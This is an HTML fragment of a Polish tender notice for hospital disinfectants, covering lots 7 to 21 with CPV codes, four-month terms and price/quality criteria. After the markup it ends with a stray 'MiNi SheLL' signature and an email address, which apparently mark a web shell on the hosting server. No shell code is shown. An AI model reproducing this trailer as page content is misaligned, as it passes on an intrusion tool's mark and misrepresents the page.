<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. ocena jakościowa - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Chusteczki bezalkoholowe do dezynfekcji drobnego sprzętu, głowic USG, stetoskopów itp., Preparat do dezynfekcji powierzchni trudno dostępnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chusteczki bezalkoholowe do dezynfekcji drobnego sprzętu, głowic USG, stetoskopów itp., Preparat do dezynfekcji powierzchni trudno dostępnych, grupa zawiera 2 pozycje.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. ocena jakościowa - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Preparat do mycia i dezynfekcji inkubatorów, Preparat do dezynfekcji pokryw do inkubatorów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Preparat do mycia i dezynfekcji inkubatorów, Preparat do dezynfekcji pokryw do inkubatorów , grupa zawiera 2 pozycje.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. ocena jakościowa - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Preparat do mycia i dezynfekcji dużych powierzchni nie zanieczyszczonych substancją organiczną z zastosowaniem  do wyrobów medycznych i  powierzchni mających kontakt z żywnością.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Preparat do mycia i dezynfekcji dużych powierzchni nie zanieczyszczonych substancją organiczną z zastosowaniem  do wyrobów medycznych i  powierzchni mających kontakt z żywnością, grupa zawiera 1 pozycję.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. ocena jakościowa - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Preparat do dezynfekcji dużych powierzchni nie zanieczyszczonych substancją organiczną oraz mający zastosowanie w przypadku powierzchni zanieczyszczonych substancją organiczną.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Preparat do dezynfekcji dużych powierzchni nie zanieczyszczonych substancją organiczną oraz mający zastosowanie w przypadku powierzchni zanieczyszczonych substancją organiczną, grupa zawiera 1 pozycję.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. ocena jakościowa - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Preparat chlorowy do dezynfekcji powierzchni zanieczyszczonych substancją organiczną, 
Preparat chlorowy do  inaktywacji miejscowych zanieczyszczeń w postaci rozlanej krwi, wydzielin i wydalin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Preparat chlorowy do dezynfekcji powierzchni zanieczyszczonych substancją organiczną, 
Preparat chlorowy do  inaktywacji miejscowych zanieczyszczeń w postaci rozlanej krwi, wydzielin i wydalin , grupa zawiera 2 pozycje.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. ocena jakościowa - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Preparat do  dezynfekcji i mycia muszli klozetowych i pisuarów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Preparat do  dezynfekcji i mycia muszli klozetowych i pisuarów, grupa zawiera 1 pozycję.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Preparat  pianowy do  dezynfekcji  i mycia  małych i trudnodostępnych  powierzchni oraz wyrobów medycznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Preparat  pianowy do  dezynfekcji  i mycia  małych i trudnodostępnych  powierzchni oraz wyrobów medycznych , grupa zawiera 1 pozycję.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. ocena jakościowa - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Preparaty do mycia i dezynfekcji maszynowej oraz pielęgnacji manualnej narzędzi chirurgicznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Preparaty do mycia i dezynfekcji maszynowej oraz pielęgnacji manualnej narzędzi chirurgicznych , grupa zawiera 5 pozycji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. ocena jakościowa - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Preparat do wstępnego nawilżania silnie zabrudzonych narzędzi przed dezynfekcją maszynową, mający również zastosowanie w myjni ultradźwiękowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Preparat do wstępnego nawilżania silnie zabrudzonych narzędzi przed dezynfekcją maszynową, mający również zastosowanie w myjni ultradźwiękowej, grupa zawiera 1 pozycję.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. ocena jakościowa - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Preparaty przeznaczone:
A)	Do mycia endoskopów w myjni dezynfekcyjnej INNOVA E3  firmy BHT 
B)	 Do dezynfekcji endoskopów elastycznych w myjni dezynfekcyjnej INNOVA E3  firmy BHT :.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Preparaty przeznaczone:
A)	Do mycia endoskopów w myjni dezynfekcyjnej INNOVA E3  firmy BHT 
B)	 Do dezynfekcji endoskopów elastycznych w myjni dezynfekcyjnej INNOVA E3  firmy BHT, grupa zawiera 2 pozycje.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. ocena jakościowa - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Płynny preparat do mycia i dezynfekcji sprzętu laparoskopowego, oprzyrządowania do endoskopów, mający zastosowanie w przepływowej myjni ultradźwiękowej Medisafe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Płynny preparat do mycia i dezynfekcji sprzętu laparoskopowego, oprzyrządowania do endoskopów, mający zastosowanie w przepływowej myjni ultradźwiękowej Medisafe, grupa zawiera 1 pozycję.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. ocena jakościowa - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Preparat do mycia i dezynfekcji narzędzi m.in. sprzętu okulistycznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Preparat do mycia i dezynfekcji narzędzi m.in. sprzętu okulistycznego, grupa zawiera 1 pozycję.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. ocena jakościowa - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Preparat do mycia i dezynfekcji precyzyjnych narzędzi obrotowych w stomatologii, Preparat do dezynfekcji ssaków i ślinociągów stomatologicznych w postaci żelu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Preparat do mycia i dezynfekcji precyzyjnych narzędzi obrotowych w stomatologii, Preparat do dezynfekcji ssaków i ślinociągów stomatologicznych w postaci żelu, grupa zawiera 2 pozycje.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Preparat do dezynfekcji i mycia kontenerów do transportu sprzętu medycznego wykonanych z polipropylenu itp..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Preparat do dezynfekcji i mycia kontenerów do transportu sprzętu medycznego wykonanych z polipropylenu itp., grupa zawiera 1 pozycję.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. ocena jakościowa - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Preparat do maszynowego mycia kontenerów narzędziowych PrimeLine firmy Aesculap.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Preparat do maszynowego mycia kontenerów narzędziowych PrimeLine firmy Aesculap, grupa zawiera 1 pozycję.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. ocena jakościowa - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com